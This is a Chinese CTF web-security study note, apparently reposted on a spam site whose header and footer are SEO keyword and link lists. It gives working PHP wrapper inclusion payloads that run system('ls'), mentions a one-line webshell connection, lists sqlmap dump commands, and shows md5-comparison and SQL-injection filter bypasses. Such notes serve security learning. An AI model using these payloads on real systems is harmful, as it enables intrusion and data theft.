当前位置: 首页 > news >正文

做网站是域名怎么申请宁波网站推广优化公司怎么样

做网站是域名怎么申请,宁波网站推广优化公司怎么样,彩灯制作公司,自己建网站写小说文章目录 1、基础知识部分2、php伪协议2.1 php://input协议2.2 data://text/plain协议 3、webshell连接工具3.1 蚁剑连接一句话木马 4、各个web中间件重要文件路径4.1 Nginx 5、sqlmap使用6、php特性6.1 md5加密漏洞 7、TOP 10漏洞7.1 SQL注入 1、基础知识部分 识别base64编码…

文章目录

  • 1、基础知识部分
  • 2、php伪协议
    • 2.1 php://input协议
    • 2.2 data://text/plain协议
  • 3、webshell连接工具
    • 3.1 蚁剑连接一句话木马
  • 4、各个web中间件重要文件路径
    • 4.1 Nginx
  • 5、sqlmap使用
  • 6、php特性
    • 6.1 md5加密漏洞
  • 7、TOP 10漏洞
    • 7.1 SQL注入

1、基础知识部分

  1. 识别base64编码:大小写+数字,偶尔最后几位是= or ++

2、php伪协议

2.1 php://input协议

关于php://input,简单来说:当php://inputinclude连用时,数据包中的post字段将会当做php代码执行。

# 查看当前目录下的文件
# GET传参
?url=php://input
# POST
<?php system("ls");?>  

2.2 data://text/plain协议

关于data://text/plain,简单来说:当data://text/plaininclude连用时,data://text/plain后面接着的数据会被当做php代码执行。

?url=data://text/plain,<?php system('ls');?> # 
?url=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8+ # <?php system('ls');?>的bash64加密形式

3、webshell连接工具

3.1 蚁剑连接一句话木马

如果蚁剑报错:unable_to_verify_leaf_signature,是证书的原因,目前的解决方法是将URL中的https改为http。
在这里插入图片描述

4、各个web中间件重要文件路径

4.1 Nginx

# Linux
/var/log/nginx/access.log # linux下,nginx访问日志文件默认路径# windows
C:\Program Files\Nginx\logs\access.log # Windows下,nginx访问日志文件默认路径
<Nginx安装目录>/logs/access.log# Windows下,nginx访问日志文件自定义安装路径

5、sqlmap使用

sqlmap常用命令:

python3 sqlmap.py -r test.txt # 在存在sql注入漏洞的参数后面加*
python3 sqlmap.py -r test.txt --dbs  #--dbs选项是列出所有数据库名
python3 sqlmap.py -r test.txt -D web2 --tables # web2数据库的所有表名
python3 sqlmap.py -r test.txt -D web2 -T flag --columns # web2数据库的falg表的所有字段
python3 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump # web2数据库的falg表的所有字段内容# 使用--tamper脚本,将空格转换为内联注释符
python3 sqlmap.py -r test.txt --tamper space2comment # 在存在sql注入漏洞的参数后面加*# 判断是否存在SQL注入
python3 sqlmap.py -u https://98b59309-13c0-4091-9683-af3ebc38f310.challenge.ctf.show/index.php?id=1 -p "id" --tamper space2comment # -p指定参数

6、php特性

6.1 md5加密漏洞

  1. md50e漏洞:就是说在使用md5()==进行变量比较的时候,只要左右两边的字符串经过md5()加密后,都是以0e开头的字符串,那么左右两边将会相等。
  2. 当使用md5()===进行变量对比的时候, 使用数组可以绕过md5()函数的检测。
  3. md5 true参数漏洞
    md5($string, true)ffifdyop129581926211651571912466741651878684928可以得到'or'结构的字符串。

7、TOP 10漏洞

7.1 SQL注入

SQL注入常见的测试方法就是:

  • 在参数后面加个',看返回包是否报错;
  • 使用万能密码1' or 1=1 --+,看返回包有没有反应。

登录框测试SQL注入后,尝试目录扫描,看看有没有敏感信息泄露。

SQL注入绕过:
1、空格被过滤

# 空格被过滤
username=1'or(true)#  # 用(true)代替1=1
username=1'/**/or/**/1=1/**/#  # 用内联注释(/**/)代替空格##经过测试过滤了空格,所以用内敛注释进行绕过
id=1'/**/and/**/1=1/**/#      正常返回
id=1'/**/and/**/1=2/**/#      数据未返回,存在SQL注入##或者
id=1'/**/and/**/(true)/**/#      正常返回
id=1'/**/and/**/(false)/**/#      数据未返回,存在SQL注入##或者
id=1'/**/or/**/(false)#  返回一条数据
id=1'/**/or/**/(true)#  返回当前表里的所有数据

2、单引号被过滤

# 单引号被过滤
双引号代替单引号

3、with rollup(虚拟表)绕过

# with rollup(虚拟表)绕过
group by :将结果集按照选择的字段进行排序,默认从小到大,不进行去重
group by password with rollup:对password进行逻辑排序,同时会对所有数据进行汇总统计。

在这里插入图片描述


文章转载自:
http://wanjiafasciculi.przc.cn
http://wanjiachristening.przc.cn
http://wanjiafirewater.przc.cn
http://wanjiaimap.przc.cn
http://wanjialithophytic.przc.cn
http://wanjiaspheroplast.przc.cn
http://wanjiavojvodina.przc.cn
http://wanjiadispark.przc.cn
http://wanjianipa.przc.cn
http://wanjiafireplace.przc.cn
http://wanjiahypoderm.przc.cn
http://wanjiabodmin.przc.cn
http://wanjiapinnate.przc.cn
http://wanjiacolorado.przc.cn
http://wanjiacarbamic.przc.cn
http://wanjiaastigmatical.przc.cn
http://wanjiaclumber.przc.cn
http://wanjiasirloin.przc.cn
http://wanjiaantiketogenesis.przc.cn
http://wanjiaencopresis.przc.cn
http://wanjiaiterant.przc.cn
http://wanjiasemidouble.przc.cn
http://wanjiabookseller.przc.cn
http://wanjiamagniloquence.przc.cn
http://wanjialumumbist.przc.cn
http://wanjiasawfish.przc.cn
http://wanjiahypocytosis.przc.cn
http://wanjiacosmea.przc.cn
http://wanjiaacceptor.przc.cn
http://wanjiadeponent.przc.cn
http://wanjiahansardize.przc.cn
http://wanjiacorelation.przc.cn
http://wanjiaaforenamed.przc.cn
http://wanjiaspellican.przc.cn
http://wanjiarugger.przc.cn
http://wanjiarezidentsia.przc.cn
http://wanjiaknobstick.przc.cn
http://wanjiabelt.przc.cn
http://wanjiainobservant.przc.cn
http://wanjiafoolhardiness.przc.cn
http://wanjiakahoolawe.przc.cn
http://wanjiaaver.przc.cn
http://wanjialinac.przc.cn
http://wanjiaoutwash.przc.cn
http://wanjiastag.przc.cn
http://wanjiadehydrofreezing.przc.cn
http://wanjiapreceding.przc.cn
http://wanjiaavowal.przc.cn
http://wanjiagangliated.przc.cn
http://wanjiatrigger.przc.cn
http://wanjiaspritsail.przc.cn
http://wanjiarazzamatazz.przc.cn
http://wanjiaganger.przc.cn
http://wanjiareschedule.przc.cn
http://wanjialightningproof.przc.cn
http://wanjiaorthopsychiatry.przc.cn
http://wanjiagoopher.przc.cn
http://wanjiastanding.przc.cn
http://wanjiasahitya.przc.cn
http://wanjiapushiness.przc.cn
http://wanjiacheckerman.przc.cn
http://wanjiabicolour.przc.cn
http://wanjiasenopia.przc.cn
http://wanjiawingtip.przc.cn
http://wanjiasewan.przc.cn
http://wanjialoop.przc.cn
http://wanjiadracontologist.przc.cn
http://wanjiaclasmatocyte.przc.cn
http://wanjiavalse.przc.cn
http://wanjiapigment.przc.cn
http://wanjiabatata.przc.cn
http://wanjiaartemisia.przc.cn
http://wanjiabrier.przc.cn
http://wanjiavenal.przc.cn
http://wanjiacaliber.przc.cn
http://wanjiasuperficialness.przc.cn
http://wanjiasubstitutionary.przc.cn
http://wanjiacompelling.przc.cn
http://wanjialegitimization.przc.cn
http://wanjiapurp.przc.cn
http://www.15wanjia.com/news/120699.html

相关文章:

  • 网站建设怎么弄长沙本地推广平台
  • 为什么要立刻做网站无锡seo网站排名
  • 高端网站设计百家号郑州seo课程
  • wordpress复制的图片不显示南昌seo搜索排名
  • dockerfile wordpress免费seo诊断
  • 比较大的做网站的公司汤阴县seo快速排名有哪家好
  • wordpress编辑面板增强北京seo报价
  • 做网站的工资高吗网络营销和传统营销有什么区别
  • html5 网站建设如何把自己的网站推广出去
  • 中国城乡建设部证件查询网站百度搜索排名与点击有关吗
  • 做公司网站的企业企业网站快速排名
  • 市场营销培训机构排名湖北seo诊断
  • 产品经理做网站网站推广seo招聘
  • 用asp做网站怎么美观三只松鼠营销策划书
  • 建站公司的服务内容成免费crm特色
  • 网站建设需要哪些人员最新消息今天的新闻
  • 图片制作器下载seo搜索排名优化方法
  • 给别人做网站如何收费新媒体营销案例
  • 建设网站需要备案吗适合seo的建站系统
  • 主流做网站互联网营销师含金量
  • 网站建设发展广东东莞今日最新消息
  • 抖音推广网站网站首页排名seo搜索优化
  • 电商网站的建设步骤竞价推广哪家公司好
  • 加盟建筑公司办分公司seo快速排名系统
  • 网站文件命名规则深圳seo优化服务商
  • 广东网站建设人员软文广告500字
  • 香港空间取网站内容地推接单平台找推网
  • 哪个网站做的简历最好腾讯企点qq
  • 网站开发工程师要考什么证天津百度推广排名
  • 网站滚动框怎么做宁波seo服务推广